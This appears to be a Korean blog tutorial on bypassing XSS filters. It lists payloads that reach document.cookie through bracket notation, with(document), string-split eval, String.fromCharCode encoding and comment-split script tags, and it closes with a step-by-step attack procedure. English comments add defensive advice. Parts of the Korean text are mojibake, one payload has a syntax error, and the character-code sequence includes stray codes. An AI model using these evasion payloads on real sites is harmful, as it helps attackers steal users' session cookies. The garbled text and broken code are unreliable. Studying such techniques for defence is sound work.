
XSS 우회 공격


 

document.cookie 우회
document["cookie"]
# document.cookie == document["cookie"] 를 증명

var obj = {"id":"iu" , "name":"์ด์ง€์€" , "age":"30"}
// Dot and bracket notation address the same property: both reads yield "iu".
var result1 = obj.id;
var result2 = obj["id"];

// document.write() is an HTML-injection sink; it is used here only to show that
// the two values are identical. Defensive note: a deny-list that matches the
// literal token `document.cookie` is defeated by the bracket form, so filtering
// source text is not a mitigation — encode output for its context, mark session
// cookies HttpOnly, and deploy a Content-Security-Policy instead.
document.write(result1);
document.write(result2);

<script>alert(document["cookie"])</script>

 

document.cookie 우회
with(document){ alert(cookie); }
# document.cookie == with(document){alert(cookie);} 를 증명

var obj = {"id":"iu" , "name":"์ด์ง€์€" , "age":"30"}
// with() puts obj's properties on the scope chain, so the bare identifier `id`
// resolves to obj.id and "iu" is written; the same mechanism makes `cookie`
// resolve to document.cookie inside with(document){...}.
// with is a SyntaxError in strict mode and in ES modules, one more reason to
// ship scripts as strict/module code. As with bracket access, a keyword
// deny-list on `document.cookie` does not cover this form; rely on output
// encoding, HttpOnly cookies and CSP rather than token filtering.
with(obj){
    document.write(id);
}

<script>with(document{alert(cookie);}</script>

 

eval 함수 검증 우회
실제로 다양한 개발 코딩에서도 사용하는 함수

단순한 문자열 자체를 자바스크립트 코드로 실행

프로그래밍에서 많은 편리성을 제공하지만 악용하면 심각한 문제

# ๋ฌธ์ž์—ด์ธ alert์„ eval ํ•จ์ˆ˜๊ฐ€ ๋“ค์–ด๊ฐ€๋ฉด ์ž๋ฐ”์Šคํฌ๋ฆฝํŠธ ์ฝ”๋“œ๋กœ ์‹คํ–‰
// eval() compiles and runs its string argument as code: here a plain string
// becomes a function call.
eval("alert('test')");
var x = 1;
var y = 10;
var result = 0;

// A direct, non-strict eval shares the caller's scope: the assignment inside
// the string sets the outer `result` to 11, which document.write() then emits.
// Defensive note: eval is a code-execution sink. Never pass data an attacker
// can influence to it; a CSP script-src without 'unsafe-eval' blocks eval()
// entirely, which also neutralises the string-splitting and
// String.fromCharCode variants shown below.
eval("result = x+y");
document.write(result);

eval ํ•จ์ˆ˜์—์„œ ํ˜•ํƒœ๋Š” String ํ˜•ํƒœ , ์‹คํ–‰ํ• ์‹œ์—” ์ฝ”๋“œ

# eval 우회 사용 1
<script>eval("alert(document.cookie)")</script>

# eval 우회 사용 2
# alert | document | cookie 모두 금지할 경우
# eval은 문자열을 받기 때문에 ""와 +로 이어쓰기 가능
eval("ale"+"rt"+"(docu"+"ment.cookie)");

BurpSuite의 Proxy에서 document.cookie 작성 후 드래그, 오른쪽 버튼 클릭

# eval 우회 사용 3
# document.cookie를 아스키코드로 문자열 변경
document.cookie
String.fromCharCode(13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101)
๊ธธ์ด์ œํ•œ ์šฐํšŒ
# ๋งŒ์•ฝ title์ด 20๊ธ€์ž๊ฐ€ ๋„˜์–ด๊ฐ€๋ฉด ์•ž์—์„œ๋ถ€ํ„ฐ 20๊ธ€์ž ์ถ”์ถœ ํ›„ ... ๋ถ™์ด๊ธฐ(๊ธธ์ด์ œํ•œ)
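	# Truncate long titles to a 20-character preview.
	# mb_strlen()/mb_substr() (mbstring extension) count characters; strlen()/substr()
	# count bytes and can split a multibyte (UTF-8 Korean) character, producing
	# invalid UTF-8. Offset 0: substr($title,1,20) silently dropped the first character.
	# Truncation is not a sanitiser: a length limit neutralises neither markup nor
	# script. Encode $title for its output context (e.g. htmlspecialchars with
	# ENT_QUOTES) at render time, after truncation, so an entity is never cut in half.
	if(mb_strlen($title)>20){
			$title=mb_substr($title,0,20)."...";	# PHP's string concatenation operator is .
		}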
     
     
<script>alert/*
*/(document./*
*/cookie)</script>

 

1. 사용자 입력값 위치 확인

2. <, >, " 사용 가능 여부

3. 문자 허용 리스트 등 확인

4. 우회가 가능한지 판단 : 특수문자가 사용이 된다/안된다 > input 태그면 우회 가능 > " 허용되는 자바

> ๋ฌธ์ž์—ด ๊ฒ€์—ด์ด ์žˆ๋‹ค - alert,document,cookie / ascii, ๊ฐœํ–‰/์ฃผ์„, ๋ฉค๋ฒ„ ๋ณ€ํ™˜

5. 공격 진행

๋ฐ˜์‘ํ˜•

'๐Ÿ“  Secure' ์นดํ…Œ๊ณ ๋ฆฌ์˜ ๋‹ค๋ฅธ ๊ธ€

XSS ๊ณต๊ฒฉ - ์„ธ์…˜ ๊ฐ’ , ํ‚ค ๋กœ๊น…  (0) 2022.07.14
SESSION High jacking  (0) 2022.07.14
XSS ๊ณต๊ฒฉ ํ”„๋กœ์„ธ์Šค  (0) 2022.07.13
XSS - Cross Site Script  (0) 2022.07.12
Secure coding  (0) 2022.07.12
Contents

ํฌ์ŠคํŒ… ์ฃผ์†Œ๋ฅผ ๋ณต์‚ฌํ–ˆ์Šต๋‹ˆ๋‹ค

์ด ๊ธ€์ด ๋„์›€์ด ๋˜์—ˆ๋‹ค๋ฉด ๊ณต๊ฐ ๋ถ€ํƒ๋“œ๋ฆฝ๋‹ˆ๋‹ค.